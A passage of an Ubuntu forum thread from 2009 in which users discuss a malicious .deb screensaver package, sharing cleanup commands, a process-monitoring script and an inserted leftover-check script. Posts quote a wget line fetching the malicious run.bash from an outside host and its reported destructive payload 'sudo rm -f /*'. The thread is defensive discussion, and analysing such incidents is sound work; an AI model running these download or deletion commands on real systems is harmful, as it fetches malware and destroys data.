
Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #81
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by tinivole View Post
    I downloaded run.bash via:
    Code:
    wget http://05748.t35.com/Bots/run.bash
    And analysed the contents to find that it is an rm command to remove the entire filesystem...

    hmmm. that wasn't there a couple hours ago. looks like the op caught it just in time.
    just goes to show, a well staged deployment is everything.

  2. #82
    Join Date
    May 2009
    Beans
    1,934
    Distro
    Ubuntu Studio 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    well I don't want a congrats...

    Keep viruses in the windows world

    Thank you
    I doubt you will get anything when going to the link. That link is in the screensaver script which you were talking about.
    Last edited by running_rabbit07; December 9th, 2009 at 07:27 AM.

  3. #83
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Yes, a script to display the ads. As far as I can tell, it's a free website hosted on t35.com, set-up so the person could test this out. Has someone contacted t35.com yet?

  4. #84
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Wait there was rm commands to delete stuff in / ?

  5. #85
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    Wait there was rm commands to delete stuff in / ?
    As far as I can tell, the command there was
    Code:
     sudo rm -f /*
    (need tinivole to confirm this)

    This wouldn't have caused damage - you need a -r there too to delete folders.

  6. #86
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    So what is the bottom line for me guys? How do I get over this and move on?
    Another day has passed and I'm just a little bit smarter.

  7. #87
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by running_rabbit07 View Post
    I hope you weren't calling me a clown for posting the results of going to the site that is in the above mentioned script. I have no intention of messing with anybody's system.
    No, can I stress I was not throwing insults at you if it came across as so....

    I was referring to the idle head that created the deb and posted it on gnome-look.

    I appreciate any help that came from the people here in the thread.

  8. #88
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Horse scanner ready

    Okay, if anything else was installed and hidden somewhere (it could be activated from an init.d script, all the original stuff could just be more "trojan" for the horse), presuming they are still using wget and ping, just open a terminal and run this script in the foreground for a few hours.
    Code:
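    #!/bin/sh
    # Poll the process table once a second and report any running wget or ping.
    
    while :
    do
    # grep -E replaces the deprecated egrep; \b limits the match to whole words
    check=$(ps -o pid,cmd -A | grep -E '\bwget\b|\bping\b')
    
    if [ -n "$check" ]; then
        echo "!!-> pid $check <-!!"
    fi
    
    sleep 1
    
    done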
    It shouldn't produce any output unless someone runs ping or wget:
    Code:
    root ~/shell: ./check.sh 
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    Which ping and wget do not start by themselves.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  9. #89
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by Enlightened Shadow View Post
    So what is the bottom line for me guys? How do I get over this and move on?
    Code:
    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
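
Added example, not written by any poster in this thread: a read-only check to run before and after the removal command above, confirming whether the three absolute paths and the `app5552` package it names are still present. The optional root prefix (for checking a mounted disk instead of the live system), the function names and the `--check` switch are assumptions of this example; the relative `index.php` and `run.bash` are skipped because their location depends on the directory they were downloaded into.

```shell
#!/bin/sh
# Read-only leftover check for the files and package named in this thread.
# Nothing is deleted or modified. Paths and package name come from the
# removal command in post #89; everything else is this example's own.

ARTIFACTS="/usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh"
PACKAGE="app5552"

# Print every listed path that still exists under the given root prefix.
find_artifacts() {
    root="${1:-}"
    for path in $ARTIFACTS; do
        if [ -e "$root$path" ] || [ -L "$root$path" ]; then
            echo "$path"
        fi
    done
}

# Succeed only if dpkg's status database records the package as installed.
# "deinstall ok config-files" (removed, not purged) does not count.
package_installed() {
    status="${1:-}/var/lib/dpkg/status"
    [ -r "$status" ] || return 1
    awk -v pkg="$PACKAGE" '
        /^Package: / { cur = $2 }
        /^Status: /  { if (cur == pkg && $0 ~ / installed$/) found = 1 }
        END { exit found ? 0 : 1 }' "$status"
}

# Summarise both checks; returns 0 when nothing is left, 1 otherwise.
report() {
    rc=0
    hits=$(find_artifacts "${1:-}")
    if [ -n "$hits" ]; then
        echo "leftover files:"
        echo "$hits" | sed 's/^/  /'
        rc=1
    fi
    if package_installed "${1:-}"; then
        echo "package $PACKAGE is still installed"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "clean"
    return "$rc"
}

# Run as: ./check-leftovers.sh --check [root-prefix]
if [ "${1:-}" = "--check" ]; then report "${2:-}"; exit $?; fi
```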

  10. #90
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    Code:
    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

    Thank you. I haven't been home for the last 1hr and 30mins so I just needed someone to catch me up real quick so I could get rid of all threats before they become worse.
    Another day has passed and I'm just a little bit smarter.
